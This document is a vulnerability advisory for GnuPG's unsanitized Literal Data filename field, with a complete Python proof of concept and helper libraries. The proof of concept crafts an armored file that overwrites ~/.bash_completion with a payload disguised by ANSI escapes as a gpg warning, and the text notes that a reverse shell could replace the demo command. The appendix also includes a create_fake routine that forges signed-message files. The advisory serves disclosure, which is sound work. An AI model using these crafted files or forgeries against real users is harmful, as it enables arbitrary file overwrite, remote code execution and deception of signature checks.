GnuPG Accepts Path Separators and Path Traversals in Literal Data "Filename" Field

GnuPG accepts arbitrary file paths in the unsigned Literal Data packet filename field and uses that value without sufficient sanitization.

Impact

Combined with ANSI escape sequences that disguise attacker-controlled output as genuine GnuPG log messages, this can trick a user into creating or overwriting any file on the system that the user can write to. Such files commonly include regularly executed scripts and programs, so the issue can lead to remote code execution (RCE).

Details

Literal Data parsing copies namelen bytes from the packet into pt->name without sanitizing or restricting directory separators or traversal sequences.

    pt->namelen = namelen;
    pt->is_partial = partial;
    if (pktlen) {
        for (i = 0; pktlen > 4 && i < namelen; pktlen--, i++)
            pt->name[i] = iobuf_get_noeof(inp);
    }

This data is then processed by get_output_file, which performs no sanitization and treats the file name field as a file path.

To quote from the GnuPG man page:

Note also that unless a modern version 5 signature is used the embedded filename is not part of the signed data.

This makes attacks more likely in certain scenarios, as an attacker can modify or insert the embedded filename to more easily deceive an inattentive user.

Detailed steps to reproduce

Scenario

Procedure

from literal_data import LiteralDataEncoding, LiteralDataPacket
from packets import Packet, PacketType
from armor import ArmorSectionType, BEGIN, END, DASHES, crc24, standard_b64encode


# Format octet of the Literal Data packet: 't' (text).
encoding = LiteralDataEncoding.Text

# Literal Data packet whose embedded file name is an absolute path. The data
# is a shell snippet: a comment line imitating a GnuPG warning, followed by
# the command to run (`echo pwned`).
ld_packet = LiteralDataPacket(
    encoding=encoding,
    file_name="/home/nine/.bash_completion", data=b"""
#gpg: WARNING: Message contains no signatures. Continue viewing [Y/n]?\necho pwned]2;
"""
)

# Wrap the body in a packet that uses the legacy (old-format) header.
packet = Packet(
    legacy=True,
    packet_type=PacketType.LiteralData,
    body=ld_packet,
)

# Serialize the packet and build the armor header and footer lines.
data = bytes(packet)
section_name = ArmorSectionType.PGP_ARMORED_FILE.value
header = BEGIN + section_name + DASHES
footer = END + section_name + DASHES

# Base64-encode the packet and wrap it at 64 characters per line.
b64_data = standard_b64encode(data).decode("utf8")
lines = [b64_data[start:start + 64] for start in range(0, len(b64_data), 64)]

# CRC-24 over the raw packet bytes, base64-encoded for the "=XXXX" line.
checksum = crc24(data).to_bytes(length=3, byteorder="big")
b64_checksum = standard_b64encode(checksum).decode("utf8")

print(header)
# The extra "\n" yields the empty line that ends the armor headers.
print("Comment: open with `gpg --decrypt pts.enc && gpg pts.enc`" + "\n")
for chunk in lines:
    print(chunk)
print("=" + b64_checksum)
print(footer)
$ gpg --decrypt pts.enc && gpg pts.enc
gpg: WARNING: Message contains no signatures. Continue viewing [Y/n]?

$ bash
pwned$

Note that instead of `echo pwned`, we could have set up a reverse shell.

Recommendations

Appendix

buffer.py

class Buffer:
    inner: bytes

    def __init__(self, inner: bytes = b""):
        self.inner = inner

    def __bytes__(self) -> bytes:
        return self.inner

    def __len__(self) -> int:
        return len(self.inner)

    def is_empty(self) -> bool:
        return len(self.inner) == 0

    def push_bytes(self, data: bytes):
        self.inner += bytes(data)

    def push_mpi(self, data: bytes, bits: int | None):
        if bits is None:
            size = len(data)
            pos = 0
            while data[pos] == 0:
                size -= 8
                pos += 1
            if data[pos] >= 0x80:
                pass
            elif data[pos] >= 0x40:
                size -= 1
            elif data[pos] >= 0x20:
                size -= 2
            elif data[pos] >= 0x10:
                size -= 3
            elif data[pos] >= 0x08:
                size -= 4
            elif data[pos] >= 0x04:
                size -= 5
            elif data[pos] >= 0x02:
                size -= 6
            elif data[pos] >= 0x01:
                size -= 7
        self.push_u16be(bits)
        self.push_bytes(data)

    def push_utf8(self, text: str):
        self.push_bytes(text.encode("utf8"))

    def push_int(self, value: int, count: int, byteorder: str = "big", signed: bool = False):
        self.push_bytes(int(value).to_bytes(count, byteorder=byteorder, signed=signed))

    def push_i8(self, value: int):
        self.push_int(value, 1, signed=True)

    def push_i16be(self, value: int):
        self.push_int(value, 2, byteorder = "big", signed=True)

    def push_i16le(self, value: int):
        self.push_int(value, 2, byteorder = "little", signed=True)

    def push_i32be(self, value: int):
        self.push_int(value, 4, byteorder = "big", signed=True)

    def push_i32le(self, value: int):
        self.push_int(value, 4, byteorder = "little", signed=True)

    def push_i64be(self, value: int):
        self.push_int(value, 8, byteorder = "big", signed=True)

    def push_i64le(self, value: int):
        self.push_int(value, 8, byteorder = "little", signed=True)

    def push_u8(self, value: int):
        self.push_int(value, 1, signed=False)

    def push_u16be(self, value: int):
        self.push_int(value, 2, byteorder = "big", signed=False)

    def push_u16le(self, value: int):
        self.push_int(value, 2, byteorder = "little", signed=False)

    def push_u32be(self, value: int):
        self.push_int(value, 4, byteorder = "big", signed=False)

    def push_u32le(self, value: int):
        self.push_int(value, 4, byteorder = "little", signed=False)

    def push_u64be(self, value: int):
        self.push_int(value, 8, byteorder = "big", signed=False)

    def push_u64le(self, value: int):
        self.push_int(value, 8, byteorder = "little", signed=False)

    def take_bytes(self, count: int) -> bytes:
        value = self.inner[:count]
        self.inner = self.inner[count:]
        return value

    def take_mpi(self) -> tuple[int, bytes]:
        bits = self.take_u16be()
        return (bits, self.take_bytes((bits + 7)//8))

    def take_utf8(self, count: int | None = None) -> str:
        text: str
        if count is None:
            count = self.inner.find(0)
            text = self.take_bytes(count)
            _null = self.take_u8()
        else:
            text = self.take_bytes(count)

        return text.decode("utf8")

    def take_int(self, count: int, byteorder: str = "big", signed: bool = False) -> int:
        return int.from_bytes(
            self.take_bytes(count),
            byteorder=byteorder,
            signed=signed,
        )

    def take_i8(self) -> int:
        return self.take_int(1, signed=True)

    def take_i16be(self) -> int:
        return self.take_int(2, byteorder="big", signed=True)

    def take_i16le(self) -> int:
        return self.take_int(2, byteorder="little", signed=True)

    def take_i32be(self) -> int:
        return self.take_int(4, byteorder="big", signed=True)

    def take_i32le(self) -> int:
        return self.take_int(4, byteorder="little", signed=True)

    def take_i64be(self) -> int:
        return self.take_int(8, byteorder="big", signed=True)

    def take_i64le(self) -> int:
        return self.take_int(8, byteorder="little", signed=True)

    def take_u8(self) -> int:
        return self.take_int(1, signed=False)

    def take_u16be(self) -> int:
        return self.take_int(2, byteorder="big", signed=False)

    def take_u16le(self) -> int:
        return self.take_int(2, byteorder="little", signed=False)

    def take_u32be(self) -> int:
        return self.take_int(4, byteorder="big", signed=False)

    def take_u32le(self) -> int:
        return self.take_int(4, byteorder="little", signed=False)

    def take_u64be(self) -> int:
        return self.take_int(8, byteorder="big", signed=False)

    def take_u64le(self) -> int:
        return self.take_int(8, byteorder="little", signed=False)

literal_data.py

from datetime import datetime
from enum import Enum

from buffer import Buffer

class LiteralDataEncoding(int, Enum):
    Binary = ord("b")
    UTF8 = ord("u")
    Text = ord("t")

class LiteralDataPacket:
    encoding: LiteralDataEncoding | None
    file_name: str
    metadata: int
    data: bytes

    def __init__(
        self,
        encoding: LiteralDataEncoding | None = None,
        file_name: str = "",
        metadata: int = 0,
        data: bytes = b"",
    ):
        self.encoding = encoding
        self.file_name = file_name
        self.metadata = metadata
        self.data = data

    def __str__(self) -> str:
        output = "\n"
        output += f"    encoding: {self.encoding},\n"
        output += f"    file_name: {repr(self.file_name)},\n"

        timestamp = datetime.fromtimestamp(self.metadata)
        output += f"    metadata: 0x{hex(self.metadata)} ({timestamp}),\n"
        output += f"    data({len(self.data)}): {self.data.hex()},\n"
        return output

    def __bytes__(self) -> bytes:
        buffer = Buffer()
        buffer.push_u8(self.encoding)
        buffer.push_u8(len(self.file_name))
        buffer.push_utf8(self.file_name)
        buffer.push_u32be(self.metadata)
        buffer.push_bytes(self.data)

        return bytes(buffer)

packets.py

from base64 import b64decode, b64encode
from enum import Enum
from sys import argv

from buffer import Buffer
from literal_data import LiteralDataEncoding, LiteralDataPacket


class PacketType(int, Enum):
    """Numeric packet type IDs as encoded in a packet's header octet.

    The IDs 15, 16 and 20 are not defined here; ``PacketType(n)`` raises
    ``ValueError`` for those and for any other unlisted value.
    """

    PublicKeyEncryptedSessionKey = 1
    Signature = 2
    SymmetricKeyEncryptedSessionKey = 3
    OnePassSignature = 4
    SecretKey = 5
    PublicKey = 6
    SecretSubkey = 7
    CompressedData = 8
    SymmetricallyEncryptedData = 9
    Marker = 10
    LiteralData = 11
    Trust = 12
    UserID = 13
    PublicSubkey = 14

    # IDs above 15 do not fit the 4-bit type field of the legacy header
    # (the legacy header stores the type shifted left by two bits).
    UserAttribute = 17
    SymmetricallyEncryptedAndIntegrityProtectedData = 18
    ModificationDetectionCode = 19
    Padding = 21


class Packet:
    legacy: bool
    packet_type: PacketType | None
    body: LiteralDataPacket | bytes

    def __init__(
        self,
        legacy: bool = False,
        packet_type: PacketType | None = None,
        body: LiteralDataPacket | bytes = b""
    ):
        self.legacy = legacy
        self.packet_type = packet_type
        self.body = body

    def __str__(self) -> str:
        prefix = "Legacy" if self.legacy else ""
        return f"{prefix}{self.packet_type}Packet({self.body})"

    def __bytes__(self) -> bytes:
        buffer = Buffer()
        raw_body = bytes(self.body)
        length = len(raw_body)

        if self.legacy:
            length_type = 0

            if length <= 0xff:
                length_type = 0
            elif length <= 0xffff:
                length_type = 1
            elif length <= 0xffff_ffff:
                length_type = 2
            else:
                length_type = 3

            buffer.push_u8(0x80 + (self.packet_type.value << 2) + length_type)

            match length_type:
                case 0:
                    buffer.push_u8(length)
                case 1:
                    buffer.push_u16be(length)
                case 2:
                    buffer.push_u32be(length)
                case _:
                    raise Exception("Not implemented")
        else:
            buffer.push_u8(0xc0 + self.packet_type.value)

            if length < 192:
                buffer.push_u8(length)
            elif length < 8383:
                length -= 192
                msb = (length >> 8) + 192
                lsb = length & 0xff
                buffer.push_u8(msb)
                buffer.push_u8(lsb)

        buffer.push_bytes(raw_body)
        return bytes(buffer)

    def from_buffer(self, buffer: Buffer):
        octed = buffer.take_u8()
        if octed >= 0xc0:
            self.legacy = False
            self.packet_type = PacketType(octed & 0x3f)
        elif octed >= 0x80:
            self.legacy = True
            self.packet_type = PacketType((octed & 0x3f) >> 2)
        else:
            raise Exception(f"Invalid Packet ID: {octed}")

        length = 0
        if self.legacy:
            match octed & 0x03:
                case 0:
                    length = buffer.take_u8()
                case 1:
                    length = buffer.take_u16be()
                case 2:
                    length = buffer.take_u32be()
                case _:
                    raise Exception(f"Indeterminate legacy length is not implemented")
        else:
            first = buffer.take_u8()
            if first < 192:
                length = first
            elif first < 224:
                msb = first - 192
                lsb = buffer.take_u8() + 192
                length = (msb << 8) + lsb
            elif first == 255:
                length = buffer.take_u32be()
            else:
                raise Exception(f"Partial body length is not implemented")

        data = buffer.take_bytes(length)
        self.body = data


class Packets:
    """Ordered sequence of packets that serializes to their concatenation."""

    packets: "list[Packet]"

    def __init__(self, packets: "list[Packet] | None" = None):
        """Wrap *packets*, or start with a new empty list when omitted.

        A list passed in is stored as-is (not copied).
        """
        # A literal [] default would be one list shared by every instance
        # created without arguments, and from_buffer appends to it.
        self.packets = [] if packets is None else packets

    def __bytes__(self) -> bytes:
        return b"".join(bytes(packet) for packet in self.packets)

    def from_buffer(self, buffer: "Buffer"):
        """Parse packets from *buffer* until it is empty and append them."""
        while not buffer.is_empty():
            packet = Packet()
            packet.from_buffer(buffer)
            self.packets.append(packet)

    def from_bytes(self, data: bytes):
        """Parse all packets contained in *data* and append them."""
        self.from_buffer(Buffer(data))

armor.py

from base64 import b64decode, standard_b64encode
from enum import Enum

from packets import Packets


def crc24(data: bytes, init: int = 0xB704CE, poly: int = 0x1864CFB) -> int:
    """Return the 24-bit CRC of *data*, computed bit by bit, MSB first.

    Args:
        data: Bytes to checksum.
        init: Initial value of the CRC register.
        poly: Generator polynomial; the default includes bit 24, so XOR-ing
            it in also clears the bit that was just shifted out.
    """
    carry_bit = 1 << 24
    register = init
    for octet in data:
        # Feed the next octet into the top eight bits of the register.
        register ^= octet << 16
        for _ in range(8):
            register <<= 1
            if register & carry_bit:
                register ^= poly
    return register & (carry_bit - 1)

class ArmorHeaderTag(str, Enum):
    """Header keys that ``ArmorHeader`` accepts."""

    Version = "Version"
    Comment = "Comment"
    MessageID = "MessageID"
    Hash = "Hash"
    Charset = "Charset"
    NotDashEscaped = "NotDashEscaped"


class ArmorHeader:
    """One ``Key: Value`` header line of an armored section."""

    tag: ArmorHeaderTag
    value: str

    def __init__(self, line: str):
        """Split *line* at its first colon into tag and stripped value.

        Raises:
            Exception: If *line* contains no colon.
            ValueError: If the key is not an ``ArmorHeaderTag`` member.
        """
        key, colon, rest = line.partition(":")
        if not colon:
            raise Exception("Invalid Header: At least one colon (':') expected")

        self.tag = ArmorHeaderTag(key)
        self.value = rest.strip()

    def __str__(self) -> str:
        return ": ".join((self.tag.value, self.value))


class ArmorSectionType(str, Enum):
    """Section names that may appear in an armor BEGIN/END line."""

    PGP_MESSAGE = "PGP MESSAGE"
    PGP_PUBLIC_KEY_BLOCK = "PGP PUBLIC KEY BLOCK"
    PGP_PRIVATE_KEY_BLOCK = "PGP PRIVATE KEY BLOCK"
    PGP_SIGNATURE = "PGP SIGNATURE"
    PGP_SIGNED_MESSAGE = "PGP SIGNED MESSAGE"
    PGP_ARMORED_FILE = "PGP ARMORED FILE"

    def is_binary(self) -> bool:
        """Return True for key blocks and signatures, False otherwise."""
        binary_kinds = (
            ArmorSectionType.PGP_PUBLIC_KEY_BLOCK,
            ArmorSectionType.PGP_PRIVATE_KEY_BLOCK,
            ArmorSectionType.PGP_SIGNATURE,
        )
        return self in binary_kinds


class ArmorSection:
    """One armored section: its type, header lines and payload."""

    section_type: ArmorSectionType
    headers: list[ArmorHeader]
    message: str  # cleartext, or base64 text that has not been decoded yet
    data: list[bytes]  # decoded base64 chunks of a binary section

    def __init__(self, section_type: ArmorSectionType):
        self.section_type = section_type
        self.headers = []
        self.message = ""
        self.data = []

    def __str__(self) -> str:
        """Return a dump of the decoded chunks or of headers and message."""
        if self.is_binary():
            chunks = "".join(
                f"    ({len(data)}): {data.hex()},\n" for data in self.data
            )
            return "Binary {\n" + chunks + "}"

        headers = "".join(f"        {header},\n" for header in self.headers)
        return (
            "Cleartext {\n"
            "    headers: {\n"
            + headers
            + "    },\n"
            + f"    message: {repr(self.message)},\n"
            + "}"
        )

    def finalise(self):
        """Decode base64 text still pending in ``message`` (binary sections).

        ``message`` itself is left unchanged.
        """
        if self.is_binary() and self.message != "":
            data = b64decode(self.message)
            self.data.append(data)

    def is_binary(self) -> bool:
        return self.section_type.is_binary()

    def create_fake(
        self,
        out_path: str,
        signature_packets: Packets,
        fake_message: str = "<insert your message here>",
    ):
        """Write a signed-message file with a replaced message text.

        The output starts with a BEGIN line carrying one extra trailing dash,
        repeats this section's headers, then *fake_message*, then an armored
        signature block built from *signature_packets*.

        Args:
            out_path: File to create or overwrite.
            signature_packets: Packets serialized into the signature block.
            fake_message: Text written in place of the message.
        """
        with open(out_path, "w") as fake_output:
            # Note the extra `-` at the end:
            fake_output.write("-----BEGIN PGP SIGNED MESSAGE------\n")
            for header in self.headers:
                fake_output.write(f"{header}\n")
            fake_output.write(f"\n{fake_message}\n")
            fake_output.write("-----BEGIN PGP SIGNATURE-----\n\n")

            data = bytes(signature_packets)

            # Wrap at 64 characters. Stepping over the string writes no empty
            # line when the length is an exact multiple of 64.
            b64_data = standard_b64encode(data).decode("utf8")
            for start in range(0, len(b64_data), 64):
                fake_output.write(f"{b64_data[start:start + 64]}\n")

            checksum = crc24(data).to_bytes(length=3, byteorder="big")
            b64_checksum = standard_b64encode(checksum).decode("utf8")
            fake_output.write(f"={b64_checksum}\n")
            fake_output.write("-----END PGP SIGNATURE-----\n")


class ArmorExpect(int, Enum):
    """Parser state: the kind of line ``ArmorParser.push_line`` expects next."""

    Preamble = 1  # outside any section, waiting for a BEGIN line
    Header = 2  # reading header lines, up to the first empty line
    Body = 3  # reading the section body, up to an END (or BEGIN) line


# Building blocks of armor delimiter lines ("-----BEGIN <type>-----") and the
# prefix that marks a dash-escaped cleartext line.
DASHES = "-" * 5
DASH_ESCAPE = "- "
BEGIN = DASHES + "BEGIN "
END = DASHES + "END "


class ArmorParser:
    expect: ArmorExpect
    dash_escaping: bool
    section: ArmorSection | None
    sections: list[ArmorSection]

    def __init__(self):
        self.expect = ArmorExpect.Preamble
        self.dash_escaping = True
        self.section = None
        self.sections = []

    def push_line(self, line: str):
        line = line.rstrip()

        match self.expect:
            case ArmorExpect.Preamble:
                if line.startswith(BEGIN) and line.endswith(DASHES):
                    section_type = ArmorSectionType(line[len(BEGIN):-len(DASHES)].strip())
                    self.section = ArmorSection(section_type)
                    self.expect = ArmorExpect.Header

            case ArmorExpect.Header:
                if line == "":
                    self.expect = ArmorExpect.Body
                else:
                    header = ArmorHeader(line)
                    self.section.headers.append(header)
                    match header.tag:
                        case ArmorHeaderTag.Hash:
                            pass
                        case ArmorHeaderTag.NotDashEscaped:
                            self.dash_escaping = False
                        case _:
                            pass

            case ArmorExpect.Body:
                opening = self.section.section_type

                if line.startswith(END) and line.endswith(DASHES):
                    closing = ArmorSectionType(line[len(END):-len(DASHES)].strip())
                    if opening != closing:
                        raise Exception(f"Mismatch between opening ({opening}) and closing ({closing}) header line")

                    self.section.finalise()
                    self.sections.append(self.section)
                    self.section = None
                    self.expect = ArmorExpect.Preamble

                elif line.startswith(BEGIN) and line.endswith(DASHES):
                    section_type = ArmorSectionType(line[len(BEGIN):-len(DASHES)].strip())
                    if section_type == ArmorSectionType.PGP_SIGNATURE:
                        self.section.finalise()
                        self.sections.append(self.section)

                        self.section = ArmorSection(section_type)
                        self.expect = ArmorExpect.Header
                    elif opening.is_binary() or self.dash_escaping:
                        raise Exception(f"Unexpected opening header line '{section_type}'")
                    else:
                        #print(f"Ignore opening header line '{section_type}'")
                        self.section.message += f"{line}\r\n"

                elif opening.is_binary():
                    if line.startswith("="):
                        line = line[1:]

                    self.section.message += line

                    if line.find("=") >= 0:
                        data = b64decode(self.section.message)
                        self.section.data.append(data)
                        self.section.message = ""

                else:
                    if self.dash_escaping and line.startswith(DASH_ESCAPE):
                        line = line[len(DASH_ESCAPE):]
                    if self.section.message:
                        self.section.message += "\r\n"
                    self.section.message += line


class Armor:
    """Collection of the armored sections read from one or more files."""

    sections: "list[ArmorSection]"

    def __init__(self, sections: "list[ArmorSection] | None" = None):
        """Wrap *sections*, or start with a new empty list when omitted.

        A list passed in is stored as-is (not copied).
        """
        # A literal [] default would be one list shared by every instance
        # created without arguments, and from_file extends it.
        self.sections = [] if sections is None else sections

    def from_file(self, file_name: str):
        """Parse *file_name* line by line and append its finished sections.

        Nothing is appended if parsing raises.
        """
        with open(file_name, "r") as file:
            parser = ArmorParser()

            for line in file:
                parser.push_line(line)

            self.sections.extend(parser.sections)